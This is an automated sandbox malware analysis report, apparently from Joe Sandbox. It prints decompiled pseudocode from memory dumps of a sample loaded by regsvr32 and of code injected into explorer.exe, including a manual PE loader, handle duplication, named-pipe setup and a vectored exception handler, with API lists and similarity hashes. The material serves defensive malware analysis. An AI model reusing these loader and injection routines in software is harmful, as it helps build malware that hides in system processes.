									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x6cb12b33
0x6cb12b39
0x6cb12b42
0x6cb12b45
0x6cb12b48
0x00000000
0x6cb12c39
0x6cb12c3d
0x6cb12c3f
0x6cb12c4d
0x6cb12d6b
0x6cb12d74
0x6cb12d77
0x6cb12d7b
0x6cb12d81
0x6cb12d89
0x6cb12d89
0x6cb12d91
0x00000000
0x6cb12d9c
0x6cb12c53
0x6cb12c5c
0x6cb12c6a
0x6cb12c6d
0x6cb12c8a
0x6cb12c91
0x6cb12ca3
0x6cb12ca3
0x6cb12caa
0x6cb12cba
0x6cb12cd2
0x6cb12cbc
0x6cb12cc4
0x6cb12cc4
0x6cb12cd5
0x6cb12cd9
0x6cb12ce9
0x6cb12d0c
0x6cb12d1e
0x6cb12ceb
0x6cb12cff
0x6cb12cff
0x6cb12d28
0x6cb12d44
0x6cb12d2a
0x6cb12d39
0x6cb12d39
0x6cb12d4c
0x6cb12d55
0x6cb12d55
0x6cb12d63
0x00000000
0x6cb12cac
0x6cb12cae
0x00000000
0x6cb12cae
0x6cb12caa
0x00000000
0x6cb12c6d
0x6cb12b50
0x6cb12b5e
0x6cb12b63
0x6cb12b6e
0x6cb12b71
0x6cb12b75
0x6cb12b77
0x6cb12b87
0x6cb12b90
0x6cb12b99
0x6cb12ba1
0x6cb12baa
0x6cb12bb5
0x6cb12bbb
0x6cb12bbe
0x6cb12bc1
0x6cb12bc8
0x6cb12bcf
0x00000000
0x00000000
0x6cb12bda
0x6cb12be8
0x6cb12bf3
0x6cb12bfd
0x6cb12c15
0x6cb12c22
0x6cb12c22
0x6cb12bff
0x6cb12c0a
0x6cb12c0a
0x6cb12c29
0x6cb12c29
0x6cb12c31
0x6cb12c31
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 6CB12C84
LoadLibraryA.KERNEL32(?), ref: 6CB12C9D
GetProcAddress.KERNEL32(00000000,890CC483), ref: 6CB12CF9
GetProcAddress.KERNEL32(00000000,?), ref: 6CB12D18

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 3e81b426024bceb628696d376ed34944f2f320b315b2c3b0184b162eb40d235b
Instruction ID: 5cfd48e9183f69db3b31410c5b86f904f910ee70bcc6d3cc0163309019e7bf33
Opcode Fuzzy Hash: 3e81b426024bceb628696d376ed34944f2f320b315b2c3b0184b162eb40d235b
Instruction Fuzzy Hash: 97A19A75A04259DFCB00CFA8C885AADBBF0FF0A314F108559E825EBB51D734AA81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6CB01C51, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6CB01C51(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x6cb1e6dc; // 0x0
				_t13 = E6CB0A501(_t41, 0);
				while(_t13 < 0) {
					E6CB097ED( &_v28);
					_t43 =  *0x6cb1e6e0; // 0x0
					_t15 =  *0x6cb1e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x6cb1e684; // 0xdbfaa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x6cb1e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x6cb1e684; // 0xdbfaa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x6cb1e6dc; // 0x0
						__eflags = 0;
						_t13 = E6CB0A501(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x6cb1e6e8; // 0x0
				_v28 = _t20;
				_t22 = E6CB0A6EB(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x6cb1e6d0, 0, 0, 2);
					E6CB097ED(0x6cb1e6e0);
					_t64 = E6CB01A01( &_v28, E6CB01226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x6cb1e760);
						_t51 = 0x27;
						E6CB09ED1(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x6cb1e6d0);
				_t48 =  *0x6cb1e6dc; // 0x0
				 *0x6cb1e6d0 = 0;
				E6CB0A51D(_t48);
				E6CB085FB( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x6cb01c51
0x6cb01c5e
0x6cb01c60
0x6cb01c67
0x6cb01ccd
0x6cb01c74
0x6cb01c79
0x6cb01c7f
0x6cb01c84
0x6cb01c8a
0x6cb01c8c
0x6cb01c90
0x6cb01cfe
0x6cb01d00
0x6cb01d82
0x6cb01d88
0x6cb01d88
0x6cb01c92
0x6cb01c9a
0x6cb01c9a
0x6cb01ca6
0x6cb01cac
0x6cb01cae
0x00000000
0x00000000
0x6cb01cb0
0x6cb01cba
0x6cb01cc0
0x6cb01cc6
0x6cb01cc8
0x00000000
0x6cb01cc8
0x6cb01c94
0x6cb01c98
0x00000000
0x00000000
0x00000000
0x6cb01c98
0x6cb01cd7
0x6cb01cd8
0x6cb01cd9
0x6cb01cda
0x6cb01cdb
0x6cb01ce0
0x6cb01cea
0x6cb01cef
0x6cb01cf7
0x6cb01d12
0x6cb01d15
0x6cb01d1f
0x6cb01d2a
0x6cb01d3d
0x6cb01d3f
0x6cb01d41
0x6cb01d43
0x6cb01d44
0x6cb01d4c
0x6cb01d4d
0x6cb01d53
0x6cb01cf9
0x6cb01cf9
0x6cb01cf9
0x6cb01d54
0x6cb01d5f
0x6cb01d62
0x6cb01d68
0x6cb01d6e
0x6cb01d79
0x6cb01d80
0x00000000

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b714672972fe15e319c53cd3d05cf89d8e7021d009bac0cf497e060e42d5067
Instruction ID: 8ce08ab6f4cad7abaa9e5bd1c3d1861435098e2e92a5318dde665502a49ed8c0
Opcode Fuzzy Hash: 9b714672972fe15e319c53cd3d05cf89d8e7021d009bac0cf497e060e42d5067
Instruction Fuzzy Hash: D93172327042849FDB18DF64D88996E7BB9FB45358B540A2AF541D7E90DB20DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CB01B16, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E6CB01B16(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x6cb1e6f4; // 0x0
				_t12 = E6CB0A501(_t38, 0);
				while(_t12 < 0) {
					E6CB097ED( &_v28);
					_t40 =  *0x6cb1e700; // 0x0
					_t14 =  *0x6cb1e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x6cb1e684; // 0xdbfaa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x6cb1e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x6cb1e684; // 0xdbfaa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x6cb1e6f4; // 0x0
								__eflags = 0;
								_t12 = E6CB0A501(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E6CB097ED(0x6cb1e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x6cb1e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x6cb1e6e8; // 0x0
				_v28 = _t24;
				_t61 = E6CB01A01( &_v28, E6CB01310, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x6cb1e760);
					_t48 = 0x27;
					E6CB09ED1(_t48);
				}
				if(_v24 != 0) {
					E6CB06871( &_v24);
				}
				_t26 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x6cb1e6ec);
				_t28 =  *0x6cb1e758; // 0x0
				 *0x6cb1e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x6cb1e6f4; // 0x0
				 *0x6cb1e758 =  !=  ? 1 : _t28;
				E6CB0A51D(_t46);
				_t15 = _t61;
				goto L12;
			}

0x6cb01b16
0x6cb01b1c
0x6cb01b2a
0x6cb01b98
0x6cb01b37
0x6cb01b3c
0x6cb01b42
0x6cb01b47
0x6cb01b4d
0x6cb01b4f
0x6cb01b53
0x6cb01c4d
0x6cb01c4d
0x6cb01b59
0x6cb01b59
0x6cb01b65
0x6cb01b65
0x6cb01b71
0x6cb01b77
0x6cb01b79
0x00000000
0x6cb01b7b
0x6cb01b7b
0x6cb01b85
0x6cb01b8b
0x6cb01b91
0x6cb01b93
0x00000000
0x6cb01b93
0x6cb01b5b
0x6cb01b5b
0x6cb01b5f
0x00000000
0x00000000
0x00000000
0x00000000
0x6cb01b5f
0x6cb01b59
0x6cb01c46
0x6cb01c4c
0x6cb01c4c
0x6cb01ba1
0x6cb01bb5
0x6cb01bb8
0x6cb01bc2
0x6cb01bce
0x6cb01bd8
0x6cb01bd9
0x6cb01bda
0x6cb01bdb
0x6cb01be0
0x6cb01be9
0x6cb01bed
0x6cb01bef
0x6cb01bf0
0x6cb01bf8
0x6cb01bf9
0x6cb01bff
0x6cb01c04
0x6cb01c0a
0x6cb01c0a
0x6cb01c0f
0x6cb01c1a
0x6cb01c1d
0x6cb01c25
0x6cb01c31
0x6cb01c34
0x6cb01c3a
0x6cb01c3f
0x6cb01c44
0x00000000

APIs

GetCurrentProcess.KERNEL32(6CB1E6EC,00000000,00000000,00000002), ref: 6CB01BB5
GetCurrentThread.KERNEL32(00000000), ref: 6CB01BB8
GetCurrentProcess.KERNEL32(00000000), ref: 6CB01BBF
DuplicateHandle.KERNEL32 ref: 6CB01BC2

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: c85ed52d35246ea9a6ceaf8dd9cceaa07ea10bc54e9ed8544f8a300a2693d760
Instruction ID: ec17fa798f970d0747b087b3beafa0d87ab6136a474ed6b494f873b948d260a0
Opcode Fuzzy Hash: c85ed52d35246ea9a6ceaf8dd9cceaa07ea10bc54e9ed8544f8a300a2693d760
Instruction Fuzzy Hash: D73190717042C09FEB18DFA4C89E96E7BB8FB56359B450929F5119BE90DB30DC04CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 2556 Parent PID: 3024 explorer.exeCOMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	43

Executed Functions

Function 000E31B5, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000E31B5(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0xfe688; // 0x80000
				_t10 = E000EC2D4( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E000E85E5(0x80000); // executed
					 *0xfe724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E000EBD52(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0xfe674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E000EBCBC( &_v20, _t38); // executed
							_t18 = E000E98CF(E000E3294, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0xfe684; // 0x25bf8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0xfe674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0xfe674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E000E85FB( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000e31b5
0x000e31bb
0x000e31cb
0x000e31d0
0x000e31d2
0x000e31d7
0x000e31e8
0x000e31ed
0x000e31f3
0x000e31f5
0x000e31fe
0x000e3203
0x000e3206
0x000e3208
0x000e320a
0x000e320c
0x000e320d
0x000e320d
0x000e321a
0x000e321d
0x000e3222
0x000e323c
0x000e3242
0x000e3247
0x000e324a
0x000e3256
0x000e3264
0x000e326b
0x000e326d
0x00000000
0x00000000
0x000e326f
0x000e327a
0x000e327d
0x00000000
0x000e324c
0x000e324c
0x000e3252
0x000e327f
0x000e327f
0x000e3280
0x000e3286
0x00000000
0x000e328f
0x000e324a
0x000e31f7
0x00000000
0x000e31f7
0x00000000

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e91499a8e470ca41fb382ac4044b9cc5faaffe627c8b2bf46a8cb1087ec775
Instruction ID: 6f23d985974ad6dc48eaea9cb1281f6c9fd5fbfb4892e46485fef46f690dec23
Opcode Fuzzy Hash: 91e91499a8e470ca41fb382ac4044b9cc5faaffe627c8b2bf46a8cb1087ec775
Instruction Fuzzy Hash: 53210D316081956EEB109BBADC49FAE3B98EF55370F20032EF165E71E1DE308600D751

Uniqueness

Uniqueness Score: -1.00%

Function 000E5A54, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E5A54(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E000E59F9);
				E000E5624(_t6, _t7); // executed
				return 0;
			}

0x000e5a54
0x000e5a60
0x000e5a66
0x000e5a6d

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,000E59F9,000E5CC9), ref: 000E5A60

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: fbb191ae4d186466416ca94aa18dd3a18163e47b3d478062204fb235449a43fe
Instruction ID: 5fd64fd765cb6e6fc74b22e988fa7890ac5587d4f566e99bda73de70758b396e
Opcode Fuzzy Hash: fbb191ae4d186466416ca94aa18dd3a18163e47b3d478062204fb235449a43fe
Instruction Fuzzy Hash: 27B092353405809ED6406761CC0AAE432906F20707F0108A0B244EA0B3CED044809651

Uniqueness

Uniqueness Score: -1.00%

Function 000E49FE, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E000E49FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xfe688; // 0x80000
					_t125 =  *0xfe68c; // 0x25bfab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E000EBBCF(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E000EB7EA(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E000EB6BF(_t66,  &_v1076, _t206, _t208);
					_t129 = E000E49BA( &_v1076,  &_v1076, _t206);
					_t141 = E000ED442( &_v1076, E000EC3BB( &_v1076), 0);
					E000EB8CC(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E000E2C82(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000E92C6(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xfe688; // 0x80000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000E91C4(_v1112);
								_t145 = _t130;
								 *0xfe740 = _t76;
								 *0xfe738 = E000E91C4(_t145);
								L17:
								_push(_t145);
								_t80 = E000E9B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xfb9c6);
								E000E9F13(0xe); // executed
								E000E9F37(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E000EA076(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E000EA3D8(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E000EA3D8(_t188, _t180, _t208); // executed
								}
								_t87 = E000E97ED(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E000EA076(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xfe688; // 0x80000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E000EFC57(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xfe688; // 0x80000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E000EE280(_t183);
										}
										E000E52B3( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xfe688; // 0x80000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E000E109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000E85B6( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x80228
									_t153 = _t51;
									L25:
									_t90 = E000E5532(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xfe688; // 0x80000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E000EC2D4(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xfe684; // 0x25bf8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xfe684; // 0x25bf8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000E85FB( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000E85FB( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E000EE2C8(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000E95C2(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E000EC02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000E85B6( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E000E2B97( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x000e49fe
0x000e4a0b
0x000e4a16
0x000e4a1b
0x000e4a1d
0x000e4a20
0x000e4a25
0x000e4a28
0x000e4a32
0x000e4a34
0x000e4a41
0x000e4a4a
0x000e4a4a
0x000e4a57
0x000e4a72
0x000e4a79
0x000e4a7b
0x000e4a80
0x000e4a85
0x000e4a8b
0x000e4a9a
0x000e4ab9
0x000e4abb
0x000e4ac1
0x000e4ac7
0x000e4acc
0x000e4ad0
0x000e4ad3
0x000e4add
0x000e4adf
0x000e4ae0
0x000e4aeb
0x000e4aed
0x000e4af0
0x000e4af5
0x000e4afc
0x000e4b51
0x000e4b51
0x000e4b56
0x000e4bbd
0x000e4bc2
0x000e4bc4
0x000e4bce
0x000e4bd3
0x000e4bd3
0x000e4be8
0x000e4bed
0x000e4bef
0x000e4bf2
0x000e4bf4
0x00000000
0x00000000
0x000e4bfa
0x000e4c04
0x000e4c0d
0x000e4c12
0x000e4c15
0x000e4c1b
0x000e4c21
0x000e4c29
0x000e4c2b
0x000e4c2e
0x000e4c2f
0x000e4c34
0x000e4c37
0x000e4c3a
0x000e4c3c
0x000e4c40
0x000e4c40
0x000e4c45
0x000e4c48
0x000e4c4a
0x000e4c4e
0x000e4c4e
0x000e4c55
0x000e4c5a
0x000e4c5c
0x000e4c60
0x000e4c62
0x000e4c68
0x000e4c6c
0x000e4c6f
0x000e4c70
0x000e4c75
0x000e4c78
0x000e4c7d
0x000e4ca5
0x000e4cab
0x000e4cb2
0x000e4cc1
0x000e4cc6
0x00000000
0x000e4cc6
0x000e4cb4
0x00000000
0x000e4c7f
0x000e4c7f
0x000e4c84
0x000e4c8b
0x000e4cd0
0x000e4cd0
0x000e4cd7
0x000e4cdb
0x000e4cdc
0x000e4cdc
0x000e4ce6
0x000e4ceb
0x000e4cee
0x000e4cef
0x000e4cf1
0x000e4cf3
0x000e4cf8
0x000e4cff
0x000e4d42
0x000e4d01
0x000e4d06
0x000e4d0e
0x000e4d12
0x000e4d1d
0x000e4d28
0x000e4d30
0x000e4d34
0x000e4d3c
0x000e4d3c
0x000e4cff
0x000e4d48
0x000e4d4b
0x000e4d4d
0x000e4d53
0x000e4d53
0x000e4d55
0x000e4d55
0x00000000
0x000e4d55
0x000e4c8d
0x000e4c8d
0x000e4c93
0x000e4c95
0x000e4c9a
0x000e4c9a
0x000e4c9c
0x000e4ccb
0x00000000
0x000e4ccb
